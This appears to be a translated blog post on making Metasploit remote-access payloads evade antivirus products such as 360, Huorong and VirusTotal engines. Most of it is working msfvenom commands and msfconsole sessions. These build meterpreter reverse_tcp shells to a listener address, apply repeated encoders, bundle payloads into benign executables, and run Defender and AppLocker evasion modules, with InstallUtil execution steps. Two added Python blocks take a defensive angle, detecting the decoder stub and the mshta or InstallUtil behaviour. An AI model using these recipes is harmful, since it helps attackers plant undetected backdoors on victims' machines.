Learning RAT AV Evasion (Part 1)

0x00 Preface

These past few days I have somehow become fascinated by AV evasion for remote-control payloads, all because of this repository: https://github.com/TideSec/BypassAntiVirus
Although many of the methods recorded there no longer evade much today, I still decided to study some of them. I only tried part of the earlier evasion tools; most of them seem inseparable from msfvenom, and the ones I found ineffective at evasion I don't intend to record. The main detection tools are the 360 suite and Huorong, with VT as a reference.

0x01 msf's built-in evasion

(I won't go over msfvenom's parameters here.)

1. Unprocessed payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -f exe -o ./payload1.exe
VT: 58/72; Huorong and 360 killed it instantly.

2. Payload encoded with msf's own encoder:

Encoder x86/shikata_ga_nai:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o ./payload2.exe
VT: 57/72; Huorong and 360 killed it instantly.

3. Payload bundled with a template binary by msf:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -x 11.exe -f exe -o ./payload3.exe
(11.exe here is a normal, backdoor-free exe: a small tool I wrote in Python myself.)
VT: 11/72
Huorong and 360 killed it instantly.

4. Bundled + encoded payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -x 11.exe -i 5 -f exe -o ./payload4.exe
(This approach is problematic: the generated payload very often fails to run.)

5. Multi-encoded payload:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.111.128 LPORT=4444 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x 360sd.exe -f exe -o payload5.exe
(For reference only: msfvenom failed to generate it, so I didn't pursue it further.)
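Why encoding (items 2, 4 and 5) barely moves the VT score: every x86/shikata_ga_nai iteration wraps the payload in another decoder stub, and the outermost stub is always cleartext, so static engines can signature the stub itself. The following heuristic scanner is an added example of mine, not code from the post or from Metasploit; the stub fragment and the buffers are constructed for the test, and the fnstenv/pop/loop shape is a heuristic, not an exact signature.

```python
import re

# fnstenv [esp-0xc]: the GetPC instruction the shikata_ga_nai decoder uses
FNSTENV = b"\xd9\x74\x24\xf4"
POP_R32 = re.compile(rb"[\x58-\x5f]")          # pop eax..edi (fetches saved EIP)
LOOP_REL8 = re.compile(rb"\xe2.", re.DOTALL)   # loop rel8 (the xor loop)


def find_getpc_decoder_stubs(data: bytes, window: int = 40) -> list:
    """Offsets of fnstenv [esp-0xc] followed, within `window` bytes, by a
    pop r32 and then a loop instruction. Heuristic: a legitimate FPU
    environment save with a nearby loop would also match."""
    hits, start = [], 0
    while (off := data.find(FNSTENV, start)) >= 0:
        region = data[off + 4: off + 4 + window]
        pop = POP_R32.search(region)
        if pop and LOOP_REL8.search(region, pop.end()):
            hits.append(off)
        start = off + 1
    return hits


def scan_file(path: str) -> list:
    """Scan a whole file (e.g. an msfvenom-built exe) for decoder-shaped stubs."""
    with open(path, "rb") as f:
        return find_getpc_decoder_stubs(f.read())


# Constructed buffers, not real payloads: NOP filler around a fragment
# shaped like the decoder (FPU instr, fnstenv, pop, counter, xor loop).
FILLER = b"\x90" * 16
SYNTHETIC_STUB = (
    b"\xd9\xee"            # fldz                 (any FPU instruction)
    + FNSTENV              # fnstenv [esp-0xc]    (saves EIP of fldz)
    + b"\x5b"              # pop ebx              (ebx = that EIP)
    + b"\x33\xc9\xb1\x0b"  # xor ecx,ecx ; mov cl, 0xb  (loop counter)
    + b"\x31\x43\x13"      # xor [ebx+0x13], eax  (decode one dword)
    + b"\x03\x43\x13"      # add eax, [ebx+0x13]  (roll the key)
    + b"\x83\xc3\x04"      # add ebx, 4
    + b"\xe2\xf4"          # loop
)
SUSPICIOUS = FILLER + SYNTHETIC_STUB + FILLER
BENIGN = FILLER + FNSTENV + b"\xc3" + FILLER  # fnstenv then ret: no loop


if __name__ == "__main__":
    print("suspicious:", find_getpc_decoder_stubs(SUSPICIOUS))  # [18]
    print("benign:    ", find_getpc_decoder_stubs(BENIGN))      # []
```

Running scan_file against a real msfvenom output will also hit on the template binary's own code wherever it happens to save the FPU environment near a loop, which is why engines combine this kind of heuristic with other signals.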

Evasion with msf's evasion modules

show evasion lists the modules in this category.

1. windows/windows_defender_exe module

msf5 > use windows/windows_defender_exe
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > show options 
Module options (evasion/windows/windows_defender_exe):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  ukup.exe         yes       Filename for the evasive file (default: random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
filename => payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > run
[*] Compiled executable size: 4096
[+] payload.exe stored at /root/.msf4/local/payload.exe

The static scan by 360 killed it outright, so there was no point trying Huorong. (Huorong is strong.)

2. windows/windows_defender_js_hta module

msf5 evasion(windows/windows_defender_exe) > use windows/windows_defender_js_hta
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > show options 
Module options (evasion/windows/windows_defender_js_hta):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  WfvPutTKt.hta    yes       Filename for the evasive file (default: random)
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/windows_defender_js_hta) > set filename payload.hta
filename => payload.hta
msf5 evasion(windows/windows_defender_js_hta) > run
[+] payload.hta stored at /root/.msf4/local/payload.hta
msf5 evasion(windows/windows_defender_js_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > set filename payload1.hta
filename => payload1.hta
msf5 evasion(windows/windows_defender_js_hta) > run
[+] payload1.hta stored at /root/.msf4/local/payload1.hta

Neither the 360 suite nor Huorong flagged it. (Although it isn't flagged, at runtime it generates a new program to return the shell, and that new program does not get past Huorong or 360; in other words, it fails behavioural detection.)
payload VT: 23/59; payload1 VT: 23/58

3. windows/applocker_evasion_install_util module

msf5 evasion(windows/windows_defender_js_hta) > use windows/applocker_evasion_install_util
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/applocker_evasion_install_util) > 
msf5 evasion(windows/applocker_evasion_install_util) > show options 
Module options (evasion/windows/applocker_evasion_install_util):
   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   FILENAME  install_util.txt  yes       Filename for the evasive file (default: install_util.txt)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/applocker_evasion_install_util) > set filename payload.txt
filename => payload.txt
msf5 evasion(windows/applocker_evasion_install_util) > show options 
Module options (evasion/windows/applocker_evasion_install_util):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  payload.txt      yes       Filename for the evasive file (default: install_util.txt)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/applocker_evasion_install_util) > run
[+] payload.txt stored at /root/.msf4/local/payload.txt
[*] Copy payload.txt to the target
[*] Compile using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\csc.exe /out:payload.exe payload.txt
[*] Execute using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

Both 360 and Huorong let it through statically, but behavioural detection stops it.
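Both evasion modules above pass static scanning and then fail on behaviour: the .hta runs under mshta.exe and spawns a fresh executable, and the install_util variant executes through InstallUtil.exe /U. The triage rule below is an added example of mine, not code from the post or from Metasploit; the events are constructed in a Sysmon Event ID 1-like shape, and the field names, paths and trusted-directory list are assumptions.

```python
import json
import ntpath

# Assumption: binaries under these prefixes are not user-writable drop locations.
TRUSTED_PREFIXES = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _user_writable(path: str) -> bool:
    """Treat anything outside the trusted prefixes as a user-writable location."""
    return not path.lower().startswith(TRUSTED_PREFIXES)


def classify(event: dict) -> list:
    """Reasons an event matches the two behaviours; an empty list means no match."""
    reasons = []
    image, parent = event.get("Image", ""), event.get("ParentImage", "")
    args = event.get("CommandLine", "").lower().split()
    if _name(parent) == "mshta.exe" and _user_writable(image):
        reasons.append("mshta.exe spawned an executable from a user-writable path")
    if _name(image) == "installutil.exe" and "/u" in args:
        reasons.append("InstallUtil.exe /U ran the uninstall routine of a supplied assembly")
    return reasons


def triage(lines) -> list:
    """(Image, reason) pairs for every JSON event line that matches a rule."""
    return [(e["Image"], r) for e in map(json.loads, lines) for r in classify(e)]


# Constructed sample events (not real telemetry).
SAMPLE_LINES = [
    json.dumps({"Image": r"C:\Users\alice\AppData\Local\Temp\drop.exe",
                "ParentImage": r"C:\Windows\System32\mshta.exe",
                "CommandLine": r"C:\Users\alice\AppData\Local\Temp\drop.exe"}),
    json.dumps({"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
                "ParentImage": r"C:\Windows\System32\cmd.exe",
                "CommandLine": "InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe"}),
    json.dumps({"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"'}),
]

if __name__ == "__main__":
    for image, reason in triage(SAMPLE_LINES):
        print(f"{image}: {reason}")
```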
